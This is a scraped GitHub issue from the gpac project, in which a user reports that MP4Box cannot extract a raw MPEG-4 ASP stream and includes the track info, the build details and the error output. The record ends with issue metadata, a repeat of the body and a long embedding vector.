Extracting Mpeg-4 ASP stream fails using this https://drive.google.com/file/d/1Ho2OrCNKxi6QNl-dpGggiszJJrV9Op1I/view?usp=sharing ``` MP4Box.exe -info "f:\TestClips&Co\rotate_90.mp4" # File Meta type: "undefined" - 0 resource item(s) # Movie Info - 2 tracks - TimeScale 1000 Duration 00:00:17.160 Fragmented: no Major Brand isom - version 512 - compatible brands: isom iso2 mp41 Created: UNKNOWN DATE # Movie Meta type: "undefined" - 0 resource item(s) iTunes Info: title: Encoding TestClip artist: AutorTest created: Heute tool: Lavf58.77.100 comment: Kleiner Testclip den ich zum Testen verwende A9gen: Documentary copyright: CopyrightTest # Track 1 Info - ID 1 - TimeScale 12800 Media Duration 00:00:17.160 Track has 1 edits: track duration is 00:00:17.160 Media Info: Language "Undetermined (und)" - Type "vide:mp4v" - 429 samples Visual Sample Entry Info: width=640 height=352 (depth=24 bits) Visual Track layout: x=0 y=0 width=640 height=352 MPEG-4 Visual Size 640 x 352 - Advanced Simple Profile @ Level 5 Pixel Aspect Ratio 1:1 - Indicated track size 640 x 352 RFC6381 Codec Parameters: mp4v.20.f5 Track Meta type: "undefined" - 0 resource item(s) Average GOP length: 214 samples Max sample duration: 512 / 12800 # Track 2 Info - ID 2 - TimeScale 48000 Media Duration 00:00:17.160 Track has 1 edits: track duration is 00:00:17.160 Media Info: Language "Undetermined (und)" - Type "soun:mp4a" - 715 samples MPEG-1 Audio - 2 Channel(s) - SampleRate 48000 - Layer 3 RFC6381 Codec Parameters: mp4a.6B.0 Track Meta type: "undefined" - 0 resource item(s) Alternate Group ID 1 All samples are sync Max sample duration: 1152 / 48000 ``` with ``` MP4Box - GPAC version 1.1.0-DEV-rev692-g7443d3bc5-ab-suite (c) 2000-2021 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io MINI build (encoders, decoders, audio and video output disabled) Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: --prefix=/local64 --disable-shared --enable-static --static-mp4box Features: GPAC_CONFIG_WIN32 GPAC_64_BITS GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_FREETYPE GPAC_HAS_MAD GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_XVID GPAC_DISABLE_3D ``` and this call: ``` MP4Box -raw 1 "F:\TestClips&Co\rotate_90.mp4" -out "E:\Output\raw.m4v" ``` gives me: ``` No filter chain found for PID V1 in filter reframer to any loaded filters - NOT CONNECTED Filters not connected: fout (dst=E:\Output\raw.m4v) (ptr=000001d54b347790) ``` Cu Selur
Extracting Mpeg-4 ASP stream fails,...
https://api.github.com/repos/gpac/gpac/issues/1746/comments
1
2021-04-15T15:55:11
2021-04-16T17:09:57Z
https://github.com/gpac/gpac/issues/1746
859,021,531
1,746
false
This is a GitHub Issue repo:gpac owner:gpac Title : Extracting Mpeg-4 ASP stream fails,... Issue date: --- start body --- Extracting Mpeg-4 ASP stream fails using this https://drive.google.com/file/d/1Ho2OrCNKxi6QNl-dpGggiszJJrV9Op1I/view?usp=sharing ``` MP4Box.exe -info "f:\TestClips&Co\rotate_90.mp4" # File Meta type: "undefined" - 0 resource item(s) # Movie Info - 2 tracks - TimeScale 1000 Duration 00:00:17.160 Fragmented: no Major Brand isom - version 512 - compatible brands: isom iso2 mp41 Created: UNKNOWN DATE # Movie Meta type: "undefined" - 0 resource item(s) iTunes Info: title: Encoding TestClip artist: AutorTest created: Heute tool: Lavf58.77.100 comment: Kleiner Testclip den ich zum Testen verwende A9gen: Documentary copyright: CopyrightTest # Track 1 Info - ID 1 - TimeScale 12800 Media Duration 00:00:17.160 Track has 1 edits: track duration is 00:00:17.160 Media Info: Language "Undetermined (und)" - Type "vide:mp4v" - 429 samples Visual Sample Entry Info: width=640 height=352 (depth=24 bits) Visual Track layout: x=0 y=0 width=640 height=352 MPEG-4 Visual Size 640 x 352 - Advanced Simple Profile @ Level 5 Pixel Aspect Ratio 1:1 - Indicated track size 640 x 352 RFC6381 Codec Parameters: mp4v.20.f5 Track Meta type: "undefined" - 0 resource item(s) Average GOP length: 214 samples Max sample duration: 512 / 12800 # Track 2 Info - ID 2 - TimeScale 48000 Media Duration 00:00:17.160 Track has 1 edits: track duration is 00:00:17.160 Media Info: Language "Undetermined (und)" - Type "soun:mp4a" - 715 samples MPEG-1 Audio - 2 Channel(s) - SampleRate 48000 - Layer 3 RFC6381 Codec Parameters: mp4a.6B.0 Track Meta type: "undefined" - 0 resource item(s) Alternate Group ID 1 All samples are sync Max sample duration: 1152 / 48000 ``` with ``` MP4Box - GPAC version 1.1.0-DEV-rev692-g7443d3bc5-ab-suite (c) 2000-2021 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io MINI build (encoders, decoders, audio and video output disabled) Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: --prefix=/local64 --disable-shared --enable-static --static-mp4box Features: GPAC_CONFIG_WIN32 GPAC_64_BITS GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_FREETYPE GPAC_HAS_MAD GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_XVID GPAC_DISABLE_3D ``` and this call: ``` MP4Box -raw 1 "F:\TestClips&Co\rotate_90.mp4" -out "E:\Output\raw.m4v" ``` gives me: ``` No filter chain found for PID V1 in filter reframer to any loaded filters - NOT CONNECTED Filters not connected: fout (dst=E:\Output\raw.m4v) (ptr=000001d54b347790) ``` Cu Selur --- end body ---
2,877
[ -0.008647968992590904, 0.04181675985455513, -0.013972803018987179, 0.015614822506904602, 0.0017016403144225478, -0.006665816530585289, -0.022003060206770897, 0.021846676245331764, -0.01240115612745285, 0.030916878953576088, 0.003497110214084387, 0.011642699129879475, 0.0010057368781417608, -0.012049295008182526, -0.0053013768047094345, 0.014653068035840988, -0.016373278573155403, 0.018281148746609688, -0.029384328052401543, -0.004965153988450766, 0.03681251034140587, 0.0031296107918024063, -0.017405405640602112, 0.023066462948918343, 0.00024043854500632733, 0.01871902123093605, -0.03162060305476189, 0.016576576977968216, -0.014926738105714321, -0.017217746004462242, 0.0002883307752199471, 0.02272242121398449, 0.004163691774010658, 0.017233384773135185, 0.027366990223526955, 0.021580826491117477, 0.05113717541098595, 0.04384973645210266, 0.01242461334913969, 0.014504504390060902, 0.0030983341857790947, -0.04006527364253998, -0.046977393329143524, 0.022753696888685226, -0.01724902167916298, 0.011775624938309193, 0.0029341322369873524, -0.014997110702097416, -0.040471866726875305, -0.004355261102318764, 0.003199982922524214, -0.018140405416488647, -0.02833656221628189, -0.0374380424618721, -0.012369879521429539, -0.026366138830780983, 0.028039434924721718, 0.04569505527615547, -0.0028500764165073633, 0.017405405640602112, -0.001483681844547391, 0.0016390872187912464, 0.016623491421341896, 0.03083868697285652, -0.0016420193715021014, -0.009977222420275211, -0.018328063189983368, 0.008984191343188286, -0.033872514963150024, 0.04597654193639755, -0.017561787739396095, -0.02866496704518795, 0.0358116589486599, 0.03171443194150925, 0.036374639719724655, -0.029962943866848946, 0.049479518085718155, 0.02140880562365055, -0.04485058784484863, 0.028414754197001457, -0.06277205795049667, 0.020251572132110596, -0.056829508394002914, -0.0063882372342050076, -0.0019430562388151884, -0.01593540795147419, -0.05307632312178612, -0.063178651034832, -0.006845656782388687, -0.010250892490148544, -0.00010470316919963807, 0.026381777599453926, 0.05001121759414673, -0.019360190257430077, 0.0009050654480233788, 0.026241034269332886, 0.013613122515380383, -0.0025803162716329098, -0.019923169165849686, -0.022894442081451416, -0.028305286541581154, -0.009234404191374779, 0.0017984021687880158, -0.02391093038022518, 0.027445180341601372, -0.0038352881092578173, 0.016248172149062157, -0.016388917341828346, 0.04444399103522301, 0.1331130415201187, -0.00339350663125515, 0.011228284798562527, 0.022784974426031113, -0.006415604148060083, 0.036280810832977295, -0.008976372890174389, -0.02419241890311241, -0.03828250989317894, -0.00026609509950503707, 0.023066462948918343, -0.02262859046459198, -0.0011142274597659707, -0.0274920966476202, 0.01843753270804882, -0.004101139027625322, 0.07506374269723892, -0.004425633233040571, 0.01447322778403759, 0.022472208365797997, -0.006235763896256685, -0.047039944678545, -0.0325276218354702, 0.00045155533007346094, -0.0025314465165138245, 0.002595954341813922, 0.00004398266173666343, -0.07012204825878143, 0.028446031734347343, 0.005262281280010939, 0.023347951471805573, -0.029634540900588036, -0.027695393189787865, 0.030197517946362495, 0.018328063189983368, 0.0010682899737730622, 0.0004820988397113979, 0.006978582125157118, 0.024645928293466568, -0.0017211881931871176, -0.004918239079415798, -0.005621961783617735, -0.032590173184871674, -0.0151534928008914, -0.0013116607442498207, 0.050042495131492615, 0.007220975589007139, 0.023347951471805573, -0.020142104476690292, -0.03821995481848717, -0.04582015797495842, -0.004249702673405409, -0.035092297941446304, 0.008906000293791294, -0.020235933363437653, -0.002394611481577158, -0.027038585394620895, 0.006243583280593157, 0.006853476166725159, 0.0038216046523302794, 0.011830358766019344, -0.006224035285413265, 0.017170831561088562, 0.016842426732182503, 0.005320924799889326, -0.05539078637957573, -0.033215705305337906, -0.005578956101089716, 0.027210606262087822, -0.0344042144715786, -0.020095190033316612, -0.019766785204410553, 0.00968791451305151, 0.0022304095327854156, -0.02103348635137081, 0.013519292697310448, -0.015364609658718109, 0.04738398641347885, -0.03737548738718033, 0.004640659317374229, -0.022738058120012283, 0.004308346193283796, 0.019579125568270683, 0.01084514707326889, -0.015552269294857979, 0.01735849119722843, -0.009531531482934952, -0.049385689198970795, -0.0379071906208992, -0.012299506925046444, 0.022566037252545357, -0.014512323774397373, -0.04478803277015686, 0.0017671255627647042, -0.015020567923784256, -0.0244582686573267, 0.007901241071522236, -0.0203610397875309, 0.05435866117477417, 0.006579806096851826, -0.04494441673159599, -0.012925038114190102, -0.04300526902079582, 0.00635305093601346, 0.007588475476950407, -0.007971612736582756, 0.01315179280936718, -0.047446541488170624, -0.013605303131043911, -0.01195546519011259, -0.008116267621517181, 0.007205337285995483, -0.014715621247887611, 0.007252252195030451, -0.002007564064115286, -0.032934218645095825, -0.022659868001937866, -0.01743668131530285, -0.010602753609418869, 0.02564677968621254, 0.01932891458272934, 0.005465578753501177, 0.02681965008378029, -0.026194117963314056, -0.01881285011768341, -0.016420193016529083, -0.0028911270201206207, -0.0026448240969330072, 0.006767465732991695, 0.01914125494658947, 0.007248342502862215, -0.02300390973687172, 0.04172293096780777, -0.012487166561186314, 0.01663913019001484, 0.032121025025844574, 0.04435016214847565, -0.021752847358584404, -0.02197178266942501, -0.02517762966454029, 0.009844297543168068, 0.016623491421341896, -0.006145843770354986, -0.009328234009444714, 0.03343464061617851, -0.01315179280936718, 0.01444977056235075, 0.04012782499194145, -0.03474825620651245, -0.008171001449227333, -0.03681251034140587, -0.0032253952231258154, -0.015474078245460987, 0.00004914451710646972, -0.011611422523856163, 0.0159745030105114, -0.04203569516539574, -0.03831378370523453, -0.017702532932162285, -0.029102839529514313, -0.0022108617704361677, -0.0019508753903210163, 0.007162332069128752, -0.026553798466920853, -0.03177698329091072, -0.0022440932225435972, -0.014668706804513931, -0.020345402881503105, -0.005696243606507778, 0.02611592784523964, 0.019266361370682716, -0.02908720076084137, 0.017233384773135185, -0.008898180909454823, 0.038782935589551926, -0.022894442081451416, 0.023926567286252975, 0.017984021455049515, -0.011791262775659561, -0.04478803277015686, 0.014293387532234192, 0.022284548729658127, 0.020001359283924103, -0.04485058784484863, 0.010790413245558739, 0.0038079211954027414, 0.008405575528740883, 0.00808499101549387, 0.03659357503056526, 0.02852422185242176, 0.014152643270790577, -0.02079891227185726, 0.029900390654802322, 0.026241034269332886, -0.0000018631544662639499, -0.028461668640375137, 0.025521673262119293, -0.034060172736644745, 0.0230508241802454, -0.005547679960727692, -0.04216080158948898, 0.03606187179684639, -0.023363590240478516, -0.026929117739200592, 0.0279612448066473, -0.00022064635413698852, -0.018218595534563065, 0.01829678751528263, -0.04757164791226387, -0.006513343658298254, -0.01219003926962614, -0.011001530103385448, 0.010852966457605362, -0.04825973138213158, 0.020001359283924103, 0.036562297493219376, -0.031464219093322754, -0.025427842512726784, 0.013198708184063435, -0.031698793172836304, 0.024771034717559814, -0.014825088903307915, 0.03578038513660431, 0.04982355982065201, -0.010602753609418869, 0.03474825620651245, -0.03987761214375496, -0.044006120413541794, -0.025115076452493668, -0.004046404734253883, 0.003178480314090848, -0.028117626905441284, 0.03069794364273548, 0.04569505527615547, -0.030948156490921974, 0.009820839390158653, -0.014355940744280815, 0.022831888869404793, 0.01762434095144272, 0.012721740640699863, 0.01824987307190895, 0.0011103178840130568, 0.00007367095531662926, -0.004320074804127216, 0.009375148452818394, 0.013566208072006702, -0.013323814608156681, 0.00609501963481307, -0.018187319859862328, 0.014441951178014278, 0.011134454980492592, 0.018171681091189384, -0.008874723687767982, 0.014817270450294018, 0.01175998616963625, -0.026835288852453232, 0.03640591353178024, -0.014887642115354538, -0.015810301527380943, -0.0029263130854815245, 0.009773924946784973, -0.013183069415390491, 0.0027327893767505884, -0.06461737304925919, 0.014770355075597763, -0.0172021072357893, -0.027789223939180374, 0.028586775064468384, 0.005121536552906036, -0.030823050066828728, 0.01400407962501049, -0.03518613055348396, 0.007326534017920494, 0.02103348635137081, -0.020251572132110596, 0.002984956605359912, -0.004089409951120615, -0.030291348695755005, 0.009070202708244324, -0.06474247574806213, -0.0421295240521431, -0.014137004502117634, 0.01305796392261982, -0.019485296681523323, -0.042223356664180756, -0.004757946822792292, 0.014387217350304127, -0.025537310168147087, -0.006685364525765181, 0.03327826038002968, -0.025021247565746307, 0.014082270674407482, 0.0013624851126223803, 0.021440081298351288, 0.017186470329761505, -0.023441782221198082, 0.059613123536109924, 0.026663266122341156, -0.01701444759964943, 0.0071075982414186, 0.015810301527380943, 0.023973483592271805, 0.011838178150355816, 0.013902430422604084, -0.016373278573155403, 0.02786741405725479, 0.006024647504091263, 0.02026721090078354, -0.016295086592435837, -0.009171850979328156, 0.01853136159479618, 0.00754156056791544, 0.011431582272052765, -0.0076588476076722145, 0.015012748539447784, 0.026694543659687042, 0.0320584736764431, -0.017608702182769775, 0.01133775245398283, 0.021659016609191895, -0.039627399295568466, 0.005414754152297974, -0.037312936037778854, 0.01706136390566826, -0.04291144013404846, 0.011298657394945621, -0.008413394913077354, -0.03746931999921799, -0.056172702461481094, -0.02847730740904808, 0.029024647548794746, -0.039439741522073746, 0.05019887909293175, 0.010852966457605362, 0.013699132949113846, 0.03828250989317894, -0.023160291835665703, -0.05298249050974846, -0.009554988704621792, 0.006630630698055029, -0.018562637269496918, 0.004136324860155582, 0.04666462540626526, 0.007561108097434044, -0.0060011898167431355, 0.009437701664865017, 0.004969063214957714, -0.013964983634650707, 0.016138704493641853, 0.025443481281399727, -0.016295086592435837, -0.004789222963154316, 0.009390787221491337, 0.028680605813860893, 0.000010415338692837395, 0.043724630028009415, 0.010094509460031986, -0.041285060346126556, -0.020955294370651245, 0.014551419764757156, -0.007471187971532345, -0.013519292697310448, -0.01197110302746296, -0.006384327542036772, 0.017546148970723152, 0.016185618937015533, 0.02828964777290821, -0.014739078469574451, -0.028743159025907516, 0.014019717462360859, -0.05304504558444023, -0.0007130078156478703, -0.027664117515087128, 0.021142954006791115, 0.0027327893767505884, -0.024692844599485397, -0.022128166630864143, 0.004832228645682335, -0.016467109322547913, 0.0076471189968287945, -0.003682814771309495, 0.03937719017267227, 0.003059238428249955, -0.008866904303431511, 0.003768825437873602, 0.002165901707485318, 0.013245622627437115, -0.013878973200917244, -0.006532891187816858, 0.012104028835892677, 0.0009382967837154865, -0.004640659317374229, -0.013878973200917244, 0.013878973200917244, -0.01757742650806904, 0.018265509977936745, -0.032558899372816086, 0.004038585815578699, 0.023129016160964966, -0.028821349143981934, -0.02419241890311241, -0.021252421662211418, -0.02054869942367077, 0.0036945436149835587, -0.04050314426422119, -0.02187795378267765, -0.010993710719048977, 0.004245792981237173, -0.0042927078902721405, 0.03191772848367691, 0.010493285953998566, -0.017890192568302155, -0.007197518367320299, -0.011673975735902786, 0.02022029645740986, -0.0032175760716199875, 0.01965731754899025, -0.015552269294857979, -0.01663913019001484, 0.00931259524077177, 0.032183580100536346, -0.00004328016075305641, -0.010125786066055298, 0.023629439994692802, 0.0379071906208992, 0.002068162430077791, 0.00799507088959217, -0.021659016609191895, 0.023410504683852196, 0.010829508304595947, -0.00862451083958149, -0.017843276262283325, 0.02927486039698124, -0.027554647997021675, 0.00610674824565649, -0.03021315671503544, 0.027992520481348038, 0.00573924882337451, 0.02079891227185726, -0.025537310168147087, -0.0027953425887972116, -0.00754156056791544, -0.0011699388269335032, 0.006767465732991695, 0.043912287801504135, 0.009961584582924843, 0.02753901109099388, -0.0012422658037394285, 0.011564508080482483, 0.001685024588368833, 0.02370763197541237, -0.010039775632321835, 0.031417302787303925, -0.01133775245398283, 0.006208396982401609, 0.016842426732182503, 0.020063912495970726, 0.037031445652246475, 0.0009597993921488523, -0.03706272318959236, -0.019313275814056396, 0.0007604113779962063, -0.004969063214957714, 0.00782304909080267, 0.025380928069353104, 0.011634879745543003, 0.03775080665946007, 0.012322964146733284, -0.017483597621321678, -0.012205677106976509, 0.003985806368291378, 0.02230018749833107, -0.013761686161160469, -0.012369879521429539, -0.0075806560926139355, 0.01663913019001484, 0.011259561404585838, 0.010508923791348934, 0.003356365719810128, -0.04125378280878067, -0.012221315875649452, -0.022988270968198776, 0.031855177134275436, 0.006732279434800148, -0.004644569009542465, 0.01400407962501049, -0.02126806043088436, -0.014879822731018066, -0.006998130120337009, -0.005899541079998016, -0.014543600380420685, -0.03224613144993782, 0.04578888416290283, -0.03097943216562271, 0.006087200250476599, -0.01352711208164692, 0.00023432985472027212, -0.005919089075177908, -0.03559272363781929, -0.016998810693621635, 0.02230018749833107, 0.004496005363762379, 0.007475097663700581, 0.05770525336265564, -0.00928913801908493, -0.0027034676168113947, -0.009062383323907852, 0.03737548738718033, 0.017452320083975792, -0.01914125494658947, -0.010618392378091812, 0.03224613144993782, -0.02536528930068016, 0.04134761169552803, -0.005047254730015993, 0.009375148452818394, 0.01885976456105709, 0.002277324441820383, -0.01815604232251644, -0.024051673710346222, -0.029618902131915092, -0.009813020937144756, 0.021705932915210724, -0.023222845047712326, -0.030009858310222626, -0.02927486039698124, 0.012111847288906574, 0.04738398641347885, -0.03240251541137695, -0.0008273627609014511, -0.00855413917452097, -0.008382118307054043, 0.005442121531814337, -0.008272649720311165, 0.0006142911734059453, -0.019735509529709816, 0.0044881864450871944, 0.006384327542036772, -0.022409655153751373, 0.00099303072784096, 0.013644399121403694, -0.039908889681100845, -0.03418527916073799, 0.007455549668520689, 0.023629439994692802, 0.015661736950278282, -0.025068162009119987, 0.037031445652246475, 0.03196464478969574, -0.00966445729136467, -0.0032527621369808912, -0.01937582902610302, -0.007971612736582756, 0.005719700828194618, -0.019109977409243584, -0.0021404896397143602, 0.024254972115159035, -0.0221125278621912, 0.013073601759970188, -0.017733808606863022, 0.01616998203098774, 0.007205337285995483, 0.010516743175685406, 0.05113717541098595, 0.007955974899232388, -0.004359170328825712, -0.011587965302169323, 0.004206697456538677, 0.016185618937015533, 0.015857215970754623, -0.0022440932225435972, 0.006149753462523222, -0.01178344339132309, -0.016107428818941116, 0.02932177484035492, -0.011775624938309193, 0.01932891458272934, -0.010508923791348934, 0.010282169096171856, -0.008663606829941273, -0.047258879989385605, 0.036468468606472015, 0.024677205830812454, -0.000471836217911914, 0.03343464061617851, -0.0014504503924399614, -0.004234064370393753, -0.005403025541454554, -0.0008967575849965215, 0.0243331640958786, -0.030916878953576088, -0.020282849669456482, 0.01696753315627575, -0.002154173096641898, -0.008546319790184498, -0.009586265310645103, 0.007209246978163719, 0.010243073105812073, -0.01782763935625553, 0.03521740436553955, 0.008147543296217918, 0.009578445926308632, 0.0014680435415357351, -0.014520143158733845, 0.015309875831007957, 0.023926567286252975, -0.009429882280528545, 0.003055328968912363, -0.018077852204442024, -0.02333231270313263, 0.002259731525555253, 0.012799931690096855, -0.01612306572496891, -0.018703382462263107, -0.012643549591302872, -0.007897331379354, 0.0311201773583889, 0.02409859001636505, 0.017374128103256226, 0.02103348635137081, 0.009719191119074821, -0.015505353920161724, -0.0353425107896328, 0.016201257705688477, 0.011462858878076077, 0.0003120325563941151, 0.0007071434520184994, -0.0022440932225435972, -0.021236784756183624, 0.022706782445311546, 0.03725038096308708, -0.012322964146733284, -0.006188848987221718, -0.008898180909454823, -0.02545912005007267, 0.005117626860737801, -0.0032038926146924496, -0.01815604232251644, -0.005055074114352465, -0.009891211986541748, 0.015779023990035057, 0.0159745030105114, 0.027179330587387085, 0.018828488886356354, -0.022096889093518257, 0.007791772950440645, -0.024004759266972542, 0.007866054773330688, -0.022597314789891243, 0.0121665820479393, 0.0005825259140692651, -0.0037199556827545166, 0.007510283961892128, -0.007518102880567312, 0.00236333510838449, 0.0000772750936448574, 0.005274009890854359, 0.022519122809171677, -0.015802482143044472, 0.042411014437675476, -0.0017065273132175207, -0.011775624938309193, 0.013972803018987179, -0.02050178498029709, -0.016232535243034363, 0.017170831561088562, 0.005254461895674467, -0.008741798810660839, -0.004957334604114294, -0.01574774831533432, -0.011916369199752808, -0.05066802725195885, 0.003917389083653688, -0.04972973093390465, 0.0023867925629019737, 0.014137004502117634, -0.029571987688541412, 0.028962094336748123, -0.0009412289364263415, -0.006642359308898449, 0.006032466422766447, -0.0041480534709990025, -0.020298486575484276, 0.03872038051486015, -0.04109739884734154, -0.006599354092031717, -0.0020232023671269417, -0.007572837173938751, 0.0004405596700962633, -0.005688424222171307, -0.010016318410634995, 0.013964983634650707, 0.007776134647428989, -0.024911779910326004, -0.02541220374405384, -0.008726160041987896, -0.022331463173031807, 0.0038978413213044405, -0.005234914366155863, -0.006435152143239975, 0.01222913432866335, 0.008311745710670948, -0.007424273528158665, 0.013972803018987179, 0.005512493662536144, 0.008413394913077354, 0.0026233214884996414, 0.022941356524825096, -0.03465442731976509, -0.02857113629579544, 0.03593676537275314, -0.019485296681523323, 0.012815570458769798, -0.0004376274882815778, -0.006978582125157118, 0.013730409555137157, -0.03201155737042427, -0.0003594360896386206, 0.017984021455049515, 0.024082951247692108, -0.003684769617393613, 0.019641678780317307, 0.005438211839646101, -0.00573924882337451, 0.023551249876618385, -0.011603603139519691, 0.006216216366738081, 0.0016987081617116928, -0.005383478011935949, -0.022143803536891937, 0.015098758973181248, -0.03224613144993782, 0.0004525327240116894, -0.016576576977968216, -0.027757946401834488, 0.011830358766019344, -0.022221995517611504, 0.0006015850813128054, 0.004144144244492054, 0.010524562560021877, 0.0028031617403030396, 0.005582865793257952, 0.009719191119074821, -0.01039163675159216, 0.026319224387407303, -0.02772667072713375, 0.00989903137087822, -0.01993880607187748, -0.03287166357040405, 0.022612951695919037, -0.014989291317760944, -0.004918239079415798, 0.009422063827514648, -0.019063062965869904, -0.009484617039561272, 0.007287438493221998, -0.012197858653962612, 0.0017329169204458594, -0.007275709882378578, -0.028446031734347343, 0.00009712838073028252, -0.004026857204735279, -0.005246642976999283, -0.014160462655127048, -0.009508074261248112, -0.03126092255115509, 0.0076041133143007755, 0.001586308004334569, -0.006134115159511566, -0.011939826421439648, -0.0034286929294466972, 0.02442699298262596, 0.02871188148856163, 0.00921876635402441, 0.0027191059198230505, 0.03135475143790245, -0.00236333510838449, 0.012119666673243046, -0.0248023122549057, -0.03815740346908569, 0.0065055242739617825, -0.002990820910781622, -0.00006566855881828815, -0.027320073917508125, 0.01352711208164692, 0.02979092299938202, 0.01904742419719696, -0.009210946969687939, -0.051543768495321274, -0.012158762663602829, -0.03596804291009903, -0.009875573217868805, -0.0057275197468698025, 0.003088560188189149, 0.0015218000626191497, -0.013855515979230404, 0.005363930016756058, 0.01150195486843586, 0.022988270968198776, -0.004656297620385885, 0.013925888575613499, 0.02101784758269787, -0.001682092435657978, -0.010806051082909107, -0.00857759639620781, -0.02569369412958622, -0.024442631751298904, -0.024051673710346222, -0.005344382021576166, 0.008827809244394302, 0.040096547454595566, -0.034623149782419205, 0.00794424582272768, 0.00014098886458668858, 0.030619751662015915, -0.01447322778403759, -0.014363760128617287, 0.01308142114430666, -0.006685364525765181, 0.0012295597698539495, 0.01284684706479311, 0.008929457515478134, -0.01508312113583088, -0.005915179383009672, 0.006474247667938471, 0.007381267845630646, 0.0022499575279653072, 0.0015354836359620094, 0.02965017780661583, 0.012104028835892677, -0.03201155737042427, 0.018734659999608994, 0.022128166630864143, -0.012784293852746487, -0.006888661999255419, -0.0022186809219419956, 0.033309534192085266, -0.026178481057286263, -0.004879143089056015, -0.018359340727329254, -0.02899337001144886, -0.02880571037530899, -0.03277783468365669, -0.04350569471716881, -0.014418493956327438, -0.029775284230709076, 0.030416453257203102, -0.01890668086707592, -0.005062893033027649, -0.00768621452152729, 0.02126806043088436, -0.005723610520362854, 0.0216433797031641, -0.01900050975382328, -0.004945605993270874, 0.004679755307734013, 0.012150943279266357, -0.03127656131982803, 0.022566037252545357, -0.024583375081419945, -0.020048273727297783, -0.008593235164880753, -0.018359340727329254, -0.01447322778403759, 0.00597382290288806, 0.018453169614076614, 0.054389938712120056, 0.016154343262314796, -0.01815604232251644, -0.023738909512758255, -0.007400815840810537, -0.008593235164880753, -0.029728369787335396, 0.031088899821043015, -0.015223865397274494, 0.014793812297284603, -0.02215944230556488, 0.012362060137093067, 0.04172293096780777, -0.000271959463134408, -0.01993880607187748, 0.016388917341828346, 0.01447322778403759, 0.006290498189628124, -0.030604112893342972, 0.02932177484035492, 0.004011218901723623, 0.027742307633161545, -0.010063232854008675, 0.009508074261248112, -0.011908549815416336, -0.019735509529709816, -0.009038926102221012, 0.001477817422710359, 0.0029360870830714703, -0.008710522204637527, 0.025771884247660637, -0.005966003518551588, -0.004230154678225517, -0.01970423199236393, 0.021158592775464058, -0.009813020937144756, -0.019391467794775963, 0.018093489110469818, -0.00032913690665736794, 0.0028090260457247496, 0.011462858878076077, -0.02635050192475319, -0.0058839027769863605, 0.01063403021544218, 0.062396734952926636, -0.03126092255115509, -0.03471698239445686, 0.01487200427800417, -0.013714771717786789, 0.017467958852648735, 0.021440081298351288, -0.004245792981237173, -0.010211796499788761, 0.01961040310561657, 0.025052523240447044, -0.013542749918997288, -0.006263130810111761, -0.0006538755842484534, 0.001378123415634036, -0.007912969216704369, -0.028320925310254097, 0.025068162009119987, -0.02871188148856163, -0.019313275814056396, -0.0009514915873296559, 0.018406255170702934, 0.004929967690259218, -0.008186639286577702, -0.013777323998510838, -0.002646778943017125, 0.015872854739427567, 0.018046574667096138, 0.013542749918997288, 0.01107972115278244, -0.019641678780317307, 0.0026330952532589436, 0.002390702022239566, 0.06924629956483841, -0.009992861188948154, -0.0036261260975152254, -0.010813870467245579, 0.009375148452818394, -0.008030256256461143, 0.0040190378203988075, 0.006192758679389954, -0.030291348695755005, -0.022128166630864143, 0.011533231474459171, -0.0025529491249471903, -0.0019108023261651397, -0.028274009004235268, -0.018593914806842804, 0.021424442529678345, 0.008014618419110775, 0.0038196498062461615, -0.0029087199363857508, 0.010766956023871899, 0.006138024851679802, -0.03177698329091072, 0.01862519048154354, 0.0013458695029839873, -0.0019567396957427263, -0.02197178266942501, -0.006188848987221718, -0.009422063827514648, -0.0007071434520184994, -0.014699983410537243, 0.01696753315627575, 0.010117966681718826, -0.04644569009542465, 0.002951725386083126, -0.008968553505837917, -0.02597518265247345, 0.014715621247887611, 0.02003263682126999, -0.02422369457781315, 0.004664117004722357, 0.00020928416051901877, -0.03527995944023132, -0.02347305789589882, 0.031198367476463318, 0.01687370426952839, 0.07431310415267944, 0.02705422416329384, 0.0012324919225648046, -0.015208226628601551, -0.027366990223526955, -0.005672785919159651, -0.024880502372980118, 0.017733808606863022, 0.0071075982414186, 0.00709586963057518, 0.02861805260181427, -0.012440251186490059, 0.012432432733476162, 0.019313275814056396, 0.007021587807685137, -0.006313955411314964, 0.010899880900979042, 0.01537242904305458, 0.0014015808701515198, 0.014621791429817677, -0.0017368264961987734, 0.004554648883640766, 0.028274009004235268, -0.012432432733476162, 0.000593277218285948, -0.025349652394652367, -0.00016469063120894134, -0.008264831267297268, -0.028821349143981934, -0.001000849879346788, -0.0053678397089242935, -0.008077171631157398, -0.008640149608254433, 0.0293686892837286, 0.010164882056415081, -0.0003249830042477697, 0.012932857498526573, 0.0007193608907982707, 0.011142274364829063, -0.015161312185227871, -0.0019127570558339357, 0.005825259257107973, 0.02735135145485401, 0.007690124213695526, -0.012979771941900253, -0.02550603449344635, 0.034529320895671844, -0.010430732741951942, -0.006345232017338276, -0.018171681091189384, 0.004128505941480398, -0.01839061640202999, -0.0016615672502666712, 0.030682304874062538, -0.0013165476266294718, -0.005848716478794813, 0.0009827681351453066, 0.01444977056235075, -0.0221125278621912, -0.019532211124897003, 0.0019528302364051342, 0.006263130810111761, 0.026882203295826912, 0.012135305441915989, -0.00015064061153680086, -0.02007955126464367, -0.03781336173415184, 0.02730443701148033, 0.002091619884595275, 0.02169029414653778, 0.006501614581793547, -0.006720550823956728, 0.012174400500953197, -0.006943396292626858, 0.015818119049072266, 0.04069080576300621, -0.03182389959692955, -0.015356790274381638, -0.02819581888616085, -0.008522862568497658, 0.017421044409275055, 0.010978071950376034, -0.008491585962474346, 0.02852422185242176, -0.0167329590767622, -0.0050707124173641205, 0.024254972115159035, -0.009961584582924843, -0.013198708184063435, -0.0379071906208992, -0.023301037028431892, -0.00611847685649991, -0.0024493455421179533, 0.0062983171083033085, -0.010907700285315514, 0.0005732406862080097, 0.0005302354111336172, -0.013073601759970188, 0.011916369199752808, -0.033309534192085266, 0.011580145917832851, -0.009375148452818394, 0.018640829250216484, -0.0016664541326463223, -0.013902430422604084, 0.023035185411572456, 